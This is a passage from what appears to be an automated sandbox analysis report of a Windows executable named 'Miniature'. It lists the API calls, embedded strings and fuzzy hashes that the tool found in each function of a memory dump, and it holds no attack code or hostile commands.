                                                  • GetDesktopWindow.USER32 ref: 00FECCB9
                                                  • GetWindowRect.USER32(00000000), ref: 00FECCC0
                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00FECD0C
                                                  • GetClientRect.USER32(?,?), ref: 00FECD19
                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00FECD3E
                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FECD69
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                  • String ID:
                                                  • API String ID: 3869813825-0
                                                  • Opcode ID: 5ae01752689c00e7fca20759e06d4c4167f183a03374bdc9ad43488b2a3823f7
                                                  • Instruction ID: 8586f53327513e1ba92e33fadc4f919999b5f648923d805285db07fd4f11ef7c
                                                  • Opcode Fuzzy Hash: 5ae01752689c00e7fca20759e06d4c4167f183a03374bdc9ad43488b2a3823f7
                                                  • Instruction Fuzzy Hash: 09518D30900749AFDB309FA9CE8AB6EBBF5FF48704F200918F586A2594C779A905DB50
                                                  APIs
                                                  • _memset.LIBCMT ref: 0101A87E
                                                  • DestroyWindow.USER32(00000000,?), ref: 0101A8F8
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0101A972
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0101A994
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101A9A7
                                                  • DestroyWindow.USER32(00000000), ref: 0101A9C9
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F90000,00000000), ref: 0101AA00
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101AA19
                                                  • GetDesktopWindow.USER32 ref: 0101AA32
                                                  • GetWindowRect.USER32(00000000), ref: 0101AA39
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0101AA51
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0101AA69
                                                    • Part of subcall function 00F929AB: GetWindowLongW.USER32(?,000000EB), ref: 00F929BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 1297703922-3619404913
                                                  • Opcode ID: 717e87463194fd97266d622bcd81672800deb9dc32a0ebf928f2980b43df15d1
                                                  • Instruction ID: 214152bf67ff2f3cd15ae27feaefe782564a0c8aaa49af87787ece4036ee73b3
                                                  • Opcode Fuzzy Hash: 717e87463194fd97266d622bcd81672800deb9dc32a0ebf928f2980b43df15d1
                                                  • Instruction Fuzzy Hash: 2371C875280340AFE721CF28C848F6B7BE5FB88310F54455CFAC687299D73AA945DB61
                                                  APIs
                                                    • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                  • DragQueryPoint.SHELL32(?,?), ref: 0101CCCF
                                                    • Part of subcall function 0101B1A9: ClientToScreen.USER32(?,?), ref: 0101B1D2
                                                    • Part of subcall function 0101B1A9: GetWindowRect.USER32(?,?), ref: 0101B248
                                                    • Part of subcall function 0101B1A9: PtInRect.USER32(?,?,0101C6BC), ref: 0101B258
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0101CD38
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0101CD43
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0101CD66
                                                  • _wcscat.LIBCMT ref: 0101CD96
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0101CDAD
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0101CDC6
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0101CDDD
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0101CDFF
                                                  • DragFinish.SHELL32(?), ref: 0101CE06
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0101CEF9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 169749273-3440237614
                                                  • Opcode ID: 35f4b4b85706a5e8f07ce03692fcad93394982e52822e991b4e16bdf9940be14
                                                  • Instruction ID: 1df8b66515079583c086eb0e95ee6a03adb57226c34e077400ee44bcca3541a8
                                                  • Opcode Fuzzy Hash: 35f4b4b85706a5e8f07ce03692fcad93394982e52822e991b4e16bdf9940be14
                                                  • Instruction Fuzzy Hash: F0618AB1108301AFD721EF60DC89D9FBBE8FF89350F500A1EF595921A5DB35AA09CB52
                                                  APIs
                                                  • VariantInit.OLEAUT32(00000000), ref: 00FF831A
                                                  • VariantCopy.OLEAUT32(00000000,?), ref: 00FF8323
                                                  • VariantClear.OLEAUT32(00000000), ref: 00FF832F
                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00FF841D
                                                  • __swprintf.LIBCMT ref: 00FF844D
                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00FF8479
                                                  • VariantInit.OLEAUT32(?), ref: 00FF852A
                                                  • SysFreeString.OLEAUT32(?), ref: 00FF85BE
                                                  • VariantClear.OLEAUT32(?), ref: 00FF8618
                                                  • VariantClear.OLEAUT32(?), ref: 00FF8627
                                                  • VariantInit.OLEAUT32(00000000), ref: 00FF8665
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                  • API String ID: 3730832054-3931177956
                                                  • Opcode ID: 2ba9fa07a01d4fd7d5e43bcf0270ebb99d64344fd4b19eeebc0a5c8d68fea519
                                                  • Instruction ID: 64363527e7340ae5d30994c1673ad2cb9ea7564feeb3bb5ee3b0ae59254790cf
                                                  • Opcode Fuzzy Hash: 2ba9fa07a01d4fd7d5e43bcf0270ebb99d64344fd4b19eeebc0a5c8d68fea519
                                                  • Instruction Fuzzy Hash: 89D19E72A04619DBDF209FA1C884B7EB7B4BF05790F248155E605DB2A4DF389C42FB91
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 01014A61
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01014AAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: e8a1c2b881cacafc81c65caf67f25170a4f8fe1fc53852b1b9d89b6a13e80fc1
                                                  • Instruction ID: 800ee7c5bc0616783f5d98a3707b75c0e89501e381da690492d3351c66f5af7b
                                                  • Opcode Fuzzy Hash: e8a1c2b881cacafc81c65caf67f25170a4f8fe1fc53852b1b9d89b6a13e80fc1
                                                  • Instruction Fuzzy Hash: 129169742007019BDB04EF20C891A6EB7E1BF94354F008859F8969B3A2DF39FD4ADB81
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00FFE31F
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FFE32F
                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FFE33B
                                                  • __wsplitpath.LIBCMT ref: 00FFE399
                                                  • _wcscat.LIBCMT ref: 00FFE3B1
                                                  • _wcscat.LIBCMT ref: 00FFE3C3
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FFE3D8
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFE3EC
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFE41E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFE43F
                                                  • _wcscpy.LIBCMT ref: 00FFE44B
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FFE48A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                  • String ID: *.*
                                                  • API String ID: 3566783562-438819550
                                                  • Opcode ID: 589f5663adf817354efc4ccbdbce21b3b90d307d77791e00b9cf1ed7dfa7ee60
                                                  • Instruction ID: a5e6efdcbb160cbdf3ecb1225eb387a49d410757b557e3591803012bca599041
                                                  • Opcode Fuzzy Hash: 589f5663adf817354efc4ccbdbce21b3b90d307d77791e00b9cf1ed7dfa7ee60
                                                  • Instruction Fuzzy Hash: AC615D765043099FDB10EF60C844DAEB7E8FF85314F04491EF98987261EB39E945DB92
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00FFA2C2
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00FFA2E3
                                                  • __swprintf.LIBCMT ref: 00FFA33C
                                                  • __swprintf.LIBCMT ref: 00FFA355
                                                  • _wprintf.LIBCMT ref: 00FFA3FC
                                                  • _wprintf.LIBCMT ref: 00FFA41A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 311963372-3080491070
                                                  • Opcode ID: 17e6efbc5c935f8a04e3488d14fbe2cb508f2bb96f473b8f0df456bb2255656d
                                                  • Instruction ID: f53b40c5fee81f6395008db10f90237b89b7c7276e06c79e0359d2f788e043b2
                                                  • Opcode Fuzzy Hash: 17e6efbc5c935f8a04e3488d14fbe2cb508f2bb96f473b8f0df456bb2255656d
                                                  • Instruction Fuzzy Hash: 745196B1940219ABCF24EBE0CD46EEEB779BF05340F500165F509B2062DB796F58EB61
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00FDF8B8,00000001,0000138C,00000001,00000000,00000001,?,01003FF9,00000000), ref: 00FF009A
                                                  • LoadStringW.USER32(00000000,?,00FDF8B8,00000001), ref: 00FF00A3
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                  • GetModuleHandleW.KERNEL32(00000000,01057310,?,00000FFF,?,?,00FDF8B8,00000001,0000138C,00000001,00000000,00000001,?,01003FF9,00000000,00000001), ref: 00FF00C5
                                                  • LoadStringW.USER32(00000000,?,00FDF8B8,00000001), ref: 00FF00C8
                                                  • __swprintf.LIBCMT ref: 00FF0118
                                                  • __swprintf.LIBCMT ref: 00FF0129
                                                  • _wprintf.LIBCMT ref: 00FF01D2
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FF01E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                  • API String ID: 984253442-2268648507
                                                  • Opcode ID: 6a60c9632bf04159fb6df817c069f1a2c70c5cc454c1fe1633feca2d504e3ff6
                                                  • Instruction ID: 6ae1d869872e3d875a7b62a5aee2f57398e9c1262c495b16debb4d2b7c4346c0
                                                  • Opcode Fuzzy Hash: 6a60c9632bf04159fb6df817c069f1a2c70c5cc454c1fe1633feca2d504e3ff6
                                                  • Instruction Fuzzy Hash: D34151B294021DAACF24FBD1CD86EEE7778BF19340F500165F605B2052DA396F08EB61
                                                  APIs
                                                    • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                    • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                  • CharLowerBuffW.USER32(?,?), ref: 00FFAA0E
                                                  • GetDriveTypeW.KERNEL32 ref: 00FFAA5B
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFAAA3
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFAADA
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFAB08
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 2698844021-4113822522
                                                  • Opcode ID: 8d89f01a6924e3320c4640ef4891f185dc436305b19ed66df8f8296249432ea8
                                                  • Instruction ID: 7ba85874af3b10f585831c18406bb3c5d6b4a46da756ee0e9be661825e6863a0
                                                  • Opcode Fuzzy Hash: 8d89f01a6924e3320c4640ef4891f185dc436305b19ed66df8f8296249432ea8
                                                  • Instruction Fuzzy Hash: 6F518DB11043059FC700EF20C88196AB3E4FF99758F10892DF89A57261DB39ED0ADB92
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FFA852
                                                  • __swprintf.LIBCMT ref: 00FFA874
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FFA8B1
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FFA8D6
                                                  • _memset.LIBCMT ref: 00FFA8F5
                                                  • _wcsncpy.LIBCMT ref: 00FFA931
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FFA966
                                                  • CloseHandle.KERNEL32(00000000), ref: 00FFA971
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00FFA97A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00FFA984
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: 601e76b5ca7a3df676537b690d17f40004dfc3f4f5faa7de0450832f436c0609
                                                  • Instruction ID: 3f96363f1706f3cc36fd0703e29526685e5b6ae442614f3977cacdfbe446286d
                                                  • Opcode Fuzzy Hash: 601e76b5ca7a3df676537b690d17f40004dfc3f4f5faa7de0450832f436c0609
                                                  • Instruction Fuzzy Hash: 5731C0B190020AABDB309FA0DC49FFB77BCEF89700F6041B6FA08D2064E77596449B25
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0101982C,?,?), ref: 0101C0C8
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C0DF
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C0EA
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C0F7
                                                  • GlobalLock.KERNEL32(00000000), ref: 0101C100
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C10F
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0101C118
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C11F
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C130
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,01023C7C,?), ref: 0101C149
                                                  • GlobalFree.KERNEL32(00000000), ref: 0101C159
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0101C17D
                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0101C1A8
                                                  • DeleteObject.GDI32(00000000), ref: 0101C1D0
                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0101C1E6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                  • String ID:
                                                  • API String ID: 3840717409-0
                                                  • Opcode ID: 512abe2e69f48bd111d6a0d6ee9e1268b218b300772a82c990c56e19a8d3be28
                                                  • Instruction ID: 8f44b09919fdd0809ea8dd346154208ea59d380a2db141af55b2f01323bf741c
                                                  • Opcode Fuzzy Hash: 512abe2e69f48bd111d6a0d6ee9e1268b218b300772a82c990c56e19a8d3be28
                                                  • Instruction Fuzzy Hash: 98415C71580304AFEB318FA5CD48EAE7BB8EF8A711F204059F946D7258C7399940CB60
                                                  APIs
                                                    • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0101C8A4
                                                  • GetFocus.USER32 ref: 0101C8B4
                                                  • GetDlgCtrlID.USER32(00000000), ref: 0101C8BF
                                                  • _memset.LIBCMT ref: 0101C9EA
                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0101CA15
                                                  • GetMenuItemCount.USER32(?), ref: 0101CA35
                                                  • GetMenuItemID.USER32(?,00000000), ref: 0101CA48
                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0101CA7C
                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0101CAC4
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0101CAFC
                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0101CB31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 1296962147-4108050209
                                                  • Opcode ID: 3e678eff1abbae2ad8529d4b6e2660eb773c9cedf151ccbc42780abcd0c60796
                                                  • Instruction ID: 538498325938fbcfa3d4c46e60694a42c9e4c967ed597ba785b663595d38ca6f
                                                  • Opcode Fuzzy Hash: 3e678eff1abbae2ad8529d4b6e2660eb773c9cedf151ccbc42780abcd0c60796
                                                  • Instruction Fuzzy Hash: 0381BE71248301AFE761CF18CA84AABBBE9FF88314F10455EF9C593285C739D905DBA2
                                                  APIs
                                                    • Part of subcall function 00FE8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FE8E3C
                                                    • Part of subcall function 00FE8E20: GetLastError.KERNEL32(?,00FE8900,?,?,?), ref: 00FE8E46
                                                    • Part of subcall function 00FE8E20: GetProcessHeap.KERNEL32(00000008,?,?,00FE8900,?,?,?), ref: 00FE8E55
                                                    • Part of subcall function 00FE8E20: HeapAlloc.KERNEL32(00000000,?,00FE8900,?,?,?), ref: 00FE8E5C
                                                    • Part of subcall function 00FE8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FE8E73
                                                    • Part of subcall function 00FE8EBD: GetProcessHeap.KERNEL32(00000008,00FE8916,00000000,00000000,?,00FE8916,?), ref: 00FE8EC9
                                                    • Part of subcall function 00FE8EBD: HeapAlloc.KERNEL32(00000000,?,00FE8916,?), ref: 00FE8ED0
                                                    • Part of subcall function 00FE8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FE8916,?), ref: 00FE8EE1
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FE8B2E
                                                  • _memset.LIBCMT ref: 00FE8B43
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FE8B62
                                                  • GetLengthSid.ADVAPI32(?), ref: 00FE8B73
